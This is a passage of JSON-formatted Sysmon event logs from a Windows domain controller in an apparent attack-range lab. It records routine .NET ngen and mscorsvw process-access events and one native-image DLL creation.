\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A7-5F25-0000-001062E20F00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A7-5F25-0000-001062E20F00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A7-5F25-0000-001062E20F00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A7-5F25-0000-001062E20F00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A7-5F25-0000-001062E20F00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A7-5F25-0000-001062E20F00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:04.106\r\nProcessGuid: {A837DB8D-04A7-5F25-0000-001062E20F00}\r\nProcessId: 2940\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b7c-0\\System.AddIn.dll\r\nCreationUtcTime: 2020-08-01 05:59:04.106","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:04.106","ProcessGuid":"{A837DB8D-04A7-5F25-0000-001062E20F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b7c-0\\System.AddIn.dll","CreationUtcTime":"2020-08-01 05:59:04.106","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.153\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-00105CE80F00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.153","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-00105CE80F00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.153\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-00105CE80F00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.153","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-00105CE80F00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.153\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-00105CE80F00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.153","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-00105CE80F00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
